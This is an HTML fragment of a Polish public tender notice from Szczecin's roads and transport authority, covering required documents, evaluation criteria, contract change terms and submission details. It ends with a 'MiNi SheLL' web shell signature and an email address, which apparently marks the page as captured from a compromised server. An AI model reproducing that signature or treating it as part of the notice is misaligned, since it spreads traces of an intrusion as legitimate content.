</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	oferta cenowa zgodnie z Rozdziałem I pkt 3 siwz
w przypadku składania oferty wspólnej należy złożyć jeden dokument
2)	odpowiednie pełnomocnictwa
tylko w sytuacjach określonych w Rozdziale I pkt 5 zdanie 2  siwz lub w przypadku składania oferty wspólnej (Rozdział III pkt 1 siwz)
3)	oświadczenie według wzoru stanowiącego załącznik nr 1 do siwz wskazujące cześć zamówienia, której wykonanie wykonawca powierzy podwykonawcom (jeżeli wykonawca przewiduje udział podwykonawców)
w przypadku składania oferty wspólnej należy złożyć jeden dokument</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Okres rękojmi - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zmiana postanowień Umowy może nastąpić na wniosek Zamawiającego lub Wykonawcy na podstawie art. 144 ustawy Prawo zamówień publicznych. Za istotne zmiany uważa się:
1)	zmianę terminu wykonania Przedmiotu Umowy,
2)	zmianę wynagrodzenia,
3)	zmianę osób przewidzianych do realizacji Umowy,
4)	zmianę dotyczącą Przedmiotu Umowy w przypadku konieczności wykonania robót zamiennych.
2.	Zmiana terminu wykonania Przedmiotu Umowy może nastąpić w następujących przypadkach:
1)	wystąpią okoliczności niezależne od Wykonawcy, przy zachowaniu przez niego należytej staranności, skutkujące niemożnością dotrzymania terminu realizacji Przedmiotu Umowy,
2)	w okresie realizacji Przedmiotu Umowy nastąpią niesprzyjające warunki atmosferyczne, np. intensywne opady deszczu, śniegu, wichury, ujemne temperatury uniemożliwiające zachowanie reżimów technologicznych, powodujące wstrzymanie robót budowlanych przez okres co najmniej 5 dni roboczych następujących po sobie i będzie to miało wpływ na termin wykonania Przedmiotu Umowy,
3)	wystąpią nieprzewidziane warunki realizacji np. warunki gruntowo - wodne, odkrycie nie zinwentaryzowanych przedmiotów, obiektów i elementów infrastruktury podziemnej i będzie to miało wpływ na termin wykonania Przedmiotu Umowy,
4)	w przypadku konieczności wykonania dokumentacji zamiennej, gdy czas na jej wykonanie spowoduje wydłużenie realizacji Umowy,
5)	wystąpienia robót zamiennych, przez które rozumie się roboty, które nie wykraczają poza Przedmiot Umowy, wprowadzające tylko zmiany ulepszające, usprawniające proces budowlany, rozwiązanie zamienne w zakresie zastosowanych materiałów w technologii wykonywanych robót,
6)	podczas wykonywania robót ziemnych wystąpi konieczność usunięcia niewybuchów i niewypałów, prowadzenia badań archeologicznych i będzie to miało wpływ na termin wykonania Przedmiotu Umowy,
7)	wystąpi konieczność wykonania robót dodatkowych nie objętych Przedmiotem Umowy, których realizacja ma wpływ na termin wykonania Przedmiotu Umowy,
8)	wystąpi konieczność wykonania zamówienia uzupełniającego, którego realizacja ma wpływ na termin wykonania Przedmiotu Umowy,
9)	zmiany obowiązujących przepisów, jeżeli zgodnie z nimi konieczne będzie dostosowanie postanowień Umowy do aktualnego stanu prawnego. W takim przypadku na wniosek Wykonawcy zostanie ustalony nowy termin wykonania Przedmiotu Umowy, co zostanie potwierdzone aneksem do umowy.
3.	Zmiana wynagrodzenia może nastąpić w przypadku zmiany urzędowej stawki podatku VAT na roboty budowlane będące Przedmiotem Umowy.
4.	Zmiana osób przewidzianych do realizacji Umowy może nastąpić pod warunkiem, że nowe osoby będą posiadały kwalifikacje nie mniejsze niż wymagane osoby wskazane w siwz. Zmiana taka</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zditm.szczecin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg i Transportu Miejskiego w Szczecinie, ul. Klonowica 5, 71-241 Szczecin, pok. nr 318, III piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.07.2015 godzina 08:30, miejsce: Zarząd Dróg i Transportu Miejskiego w Szczecinie, ul. Klonowica 5, 71-241 Szczecin, sekretariat Dyrektora, III piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com